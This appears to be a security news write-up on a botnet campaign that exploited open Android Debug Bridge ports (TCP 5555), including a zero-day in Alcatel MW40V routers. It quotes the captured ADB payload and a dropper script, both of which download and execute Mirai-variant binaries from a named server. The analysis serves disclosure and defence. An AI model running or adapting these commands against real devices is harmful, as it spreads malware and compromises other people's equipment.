Many telecommunication organizations, such as Altice – Portugal and Telekom Security (Telekom system) have detected an increase in web traffic directed to ADB shells on the 10th of July at 23:30 UTC.
According to Telekom Security, these attacks were directed to the TCP port 5555, and after a further analysis, “we saw a big chunk of this traffic coming from China, USA and the Dominican Republic“.
In total we gathered 246.434 packets from 68.361 unique IPs. Based on the packet details we gathered, we can assume that the packets were generated by a lot of different devices. In addition, the traffic behavior on port 5555 matches the typicall scan behavior of botnets.
These attacks died out quickly as the download server died out. Telekom Security reported the abuse to the cloud service provider, temporarily halting infections.
Inspecting the payload
According to Telekom report, the payload registered and captured by out T-Pot honeypots (35.204) looks like this:
CNXN 2 host::OPEN ]+shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; busybox wget http://95.215.62.169/adbs -O -> adbs; sh adbs; rm adbs
The first chars of this payload are Android Debug Bridge (ADB) commands, used for initiating a connection to a debug channel. This connection is then used to execute a shell command.
Examining the payload in detail can be concluded the following.
>/sdcard/Download/f && cd /sdcard/Download/;
Short shell builtin for clearing (or touching) the file >/sdcard/Download/f
and changing to this folder.
>/dev/f && cd /dev/;
Same as above, just with a different file (and folder).
busybox wget http://95.215.62.169/adbs -O -> adbs; sh adbs; rm adbs
Here, it is downloaded the adbs from the dropper server. Next, it’s executed and removed. The command rm is used to remove malicious tracks and to keep the malware in memory.
After a parallel search allows to identify that this IP address was already detected some time ago in correlation to the Satori botnet.
The dropped file analyzed by Telekom Security looks like this:
#!/bin/sh n="arm.bot.le mips.bot.be mipsel.bot.le arm7.bot.le x86_64.bot.le i586.bot.le i686.bot.le" http_server="95.215.62.169" for a in $n do cp /system/bin/sh $a >$a busybox wget http://$http_server/adb/$a -O -> $a chmod 777 $a ./$a done for a in $n do rm $a done
The binaries were submitted in Virus Total. It is fairly certain the binaries are a variant of Mirai.
Altice – Portugal also detected this attack on its infrastructure, namely in routers Alcatel 4G MW40V.
We have detected anomalous behaviors in our mobile network on July 10, specifically affecting this model of routers. After a detailed investigation by our teams, Alcatel was informed of all the details of our investigation.
According to Altice, “the in-depth analysis of the data provided by Altice Portugal to Alcatel’s engineering development team enabled the detection of a security vulnerability in the firmware of this model, which allows remote installation in the device memory of a malware through ADB commands to the TCP port 5555 which is open by default on these devices“.
The researchers noticed during the firmware code analysis that malware only is executed when the device is available. After a shutdown or restart the device is safe and clean until a new infection.
According to Alcatel, this is a “zero day” vulnerability affecting only this specific model of Alcatel routers.
Alcatel has published new firmware versions that are automatically installed in the devices.